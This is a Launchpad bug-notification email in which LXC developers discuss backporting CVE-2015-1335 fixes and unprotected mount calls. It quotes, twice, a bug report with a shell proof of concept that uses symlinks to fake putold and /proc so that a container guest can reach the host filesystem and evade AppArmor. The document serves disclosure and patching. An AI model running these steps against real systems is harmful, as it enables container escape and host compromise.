Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de): > Hi Serge, > > sorry for getting back to this so late. > > On Di 08 Dez 2015 17:08:58 CET, Serge Hallyn wrote: > > > Quoting Mike Gabriel (mike.gabr...@das-netzwerkteam.de): > > >> today I worked on backporting available fixes for CVE-2015-1335 to LXC > >> 0.7.x (as found in Debian squeeze-lts). > >> > >> The patch is attached, I am still in the testing-for-regressions phase. > >> Can any of the LXC devs take a look at the patch and maybe see if it is > >> suitable for Ubuntu 12.04, as well? > > > > Hi, > > > > So the thing to look for is any unconverted "mount" calls. It > > looks like the lxc_setup_fs() calls to mount_fs() are not being > > protected. So the contianer admin could attack through a /proc > > symlink. > > Hmmm... ok... > > I just checked upstream Git and the location you refer to is not using > safe_mount either there [1]
Huh, that's odd. Yes those should be protected, since /proc etc in the container could be symlinks. Do you mind sending a patch? > Furthermore, it seems non-trivial to inform safe_mount about the root > path from within lxc_init.c. > > Do you have any input on the following questions?: > > o Why mount_fs() in latest HEAD still using the mount() call > instead of safe_mount()? > o How could one pipe the rootfs path into lxc_setup_fs() -> mount_fs()? You shouldn't need to - it's just '/' because you're already chrooted there. > Thanks for any input. > > Mike > > [1] https://github.com/lxc/lxc/blob/master/src/lxc/initutils.c#L35 > -- > > DAS-NETZWERKTEAM > mike gabriel, herweg 7, 24357 fleckeby > fon: +49 (1520) 1976 148 > > GnuPG Key ID 0x25771B31 > mail: mike.gabr...@das-netzwerkteam.de, http://das-netzwerkteam.de > > freeBusy: > https://mail.das-netzwerkteam.de/mailxchange/kronolith/fb.php?u=m.gabriel%40das-netzwerkteam.de > > -- > You received this bug notification because you are subscribed to the bug > report. > Matching subscriptions: lxc > https://bugs.launchpad.net/bugs/1476662 > > Title: > lxc-start symlink vulnerabilities may allow guest to read host > filesystem, interfere with apparmor > > Status in lxc package in Ubuntu: > Fix Released > > Bug description: > lxc-start shuffles around mounts using helper directory > /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) > > It then modifies mounts operating in guest root directory before > invoking init. As it does not check if all mount points are > directories, a malicious guest may modify its internal structure > before shutdown (or was created using manipulated image) and then when > started again, guest may > > * Access the whole host root filesystem > > * Block switching from lxc-start apparmor profile to lxc-container- > default > > > # Real putold before pivot-root (root fs will end here) > mkdir -p /x/lxc_putold > > # Faked putold > ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold > mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc > touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts > > > # proc fake > mkdir -p /x/proc > umount /proc > rmdir /proc > ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc > > mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr > /usr/lib/x86_64-linux-gnu/lxc/x/proc/self > touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current > touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status > > > The issue was also found during > https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html > > To manage notifications about this bug go to: > https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- You received this bug notification because you are a member of Ubuntu Touch seeded packages, which is subscribed to lxc in Ubuntu. https://bugs.launchpad.net/bugs/1476662 Title: lxc-start symlink vulnerabilities may allow guest to read host filesystem, interfere with apparmor Status in lxc package in Ubuntu: Fix Released Bug description: lxc-start shuffles around mounts using helper directory /usr/lib/x86_64-linux-gnu/lxc (guest root fs is mounted here) It then modifies mounts operating in guest root directory before invoking init. As it does not check if all mount points are directories, a malicious guest may modify its internal structure before shutdown (or was created using manipulated image) and then when started again, guest may * Access the whole host root filesystem * Block switching from lxc-start apparmor profile to lxc-container- default # Real putold before pivot-root (root fs will end here) mkdir -p /x/lxc_putold # Faked putold ln -s /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold lxc_putold mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc touch /usr/lib/x86_64-linux-gnu/lxc/x/lxc_putold/proc/mounts # proc fake mkdir -p /x/proc umount /proc rmdir /proc ln -s /usr/lib/x86_64-linux-gnu/lxc/x/proc proc mkdir -p /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr /usr/lib/x86_64-linux-gnu/lxc/x/proc/self touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/1/attr/current touch /usr/lib/x86_64-linux-gnu/lxc/x/proc/self/status The issue was also found during https://service.ait.ac.at/security/2015/LxcSecurityAnalysis.html To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/lxc/+bug/1476662/+subscriptions -- Mailing list: https://launchpad.net/~touch-packages Post to : touch-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~touch-packages More help : https://help.launchpad.net/ListHelp
